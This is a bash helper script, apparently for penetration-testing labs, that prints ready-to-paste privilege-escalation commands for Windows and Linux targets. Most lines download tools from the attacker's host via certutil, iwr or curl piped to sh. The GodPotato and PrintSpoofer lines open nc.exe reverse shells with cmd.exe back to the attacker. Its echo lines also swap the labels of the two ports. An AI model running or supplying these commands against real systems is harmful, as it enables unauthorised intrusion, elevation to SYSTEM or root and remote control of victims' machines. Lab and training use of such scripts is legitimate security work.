#!/bin/bash

TOOLS_PORT=31337

# Colors
GREEN='\033[0;32m' # Green
NC='\033[0m'       # No Color


# Make this work for local lab also
if ip -4 a show tun0 &> /dev/null; then
    LHOST=$(ip -4 a show tun0 | grep -Po 'inet \K[\d.]+')
else
    LHOST=$(ip -4 a show wlan0 | grep -Po 'inet \K[\d.]+')
fi


if [ $# -eq 0 ]
then
  LPORT=443
else
  LPORT=$1
fi

cat << "EOF"
  _____      _                     
 |  __ \    (_)                    
 | |__) | __ ___   _____  ___  ___ 
 |  ___/ '__| \ \ / / _ \/ __|/ __|
 | |   | |  | |\ V /  __/\__ \ (__ 
 |_|   |_|  |_| \_/ \___||___/\___|
                                   
                                                                                                                         
EOF

# Automate LPE tool setup i.e PoTaToeessss

# https://patorjk.com/software/taag/#p=display&f=Big&t=Privesc

echo -e "LHOST=${GREEN}$LHOST${NC}"
echo -e "LPORT=${GREEN}$TOOLS_PORT${NC}"
echo -e "TOOLS_PORT=${GREEN}$LPORT${NC}"
echo
echo
echo '********** Windows **********'
echo
echo "# WinPeas"
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/winpeas/winPEASany.exe -Outfile C:\xampp\winpeas.exe"
echo
echo "$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "http://$LHOST:$TOOLS_PORT/windows/winpeas/winPEASany.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")"
echo
echo "# PrivescCheck"
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/PrivescCheck.ps1 -Outfile C:\Windows\Temp\PrivescCheck.ps1 | . .\PrivescCheck.ps1; Invoke-PrivescCheck"
echo 
echo "=== GodPotato ==="
echo
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/nc64.exe C:\Windows\Temp\nc.exe"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/exploits/GodPotato-NET4.exe C:\Windows\Temp\GodPotato.exe"
echo "C:\Windows\Temp\GodPotato.exe -cmd \"C:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $LHOST $LPORT\""
echo
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/nc64.exe -Outfile C:\Windows\Temp\nc.exe"
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/exploits/GodPotato-NET4.exe -Outfile C:\Windows\Temp\GodPotato.exe"
echo "C:\Windows\Temp\GodPotato.exe -cmd \"C:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $LHOST $LPORT\""
echo
echo
echo "=== PrintSpoofer ==="
echo
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/nc64.exe C:\Windows\Temp\nc.exe"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/exploits/PrintSpoofer64.exe C:\Windows\Temp\PrintSpoofer64.exe"
echo "C:\Windows\Temp\PrintSpoofer64.exe -c \"C:\Windows\Temp\nc.exe $LHOST 5555 -e cmd.exe\""
echo
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/nc64.exe -Outfile C:\Windows\Temp\nc.exe"
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/exploits/PrintSpoofer64.exe -Outfile C:\Windows\Temp\PrintSpoofer64.exe"
echo "C:\Windows\Temp\PrintSpoofer64.exe -c \"C:\Windows\Temp\nc.exe $LHOST 5555 -e cmd.exe\""
echo
echo
echo '********** Linux **********'
echo
echo "# Linpeas"
echo "curl -L http://$LHOST:$TOOLS_PORT/linux/linpeas.sh | sh | tee linpeas.txt"
echo
echo "# Linux Smart Enumeration"
echo "curl -L http://$LHOST:$TOOLS_PORT/linux/linux-smart-enumeration/lse.sh | sh | tee lsenumeration.txt"
echo
echo "# Pspy"
echo "wget -O /tmp/pspy64 http://$LHOST:$TOOLS_PORT/linux/pspy64 && chmod +x /tmp/pspy64"
echo
echo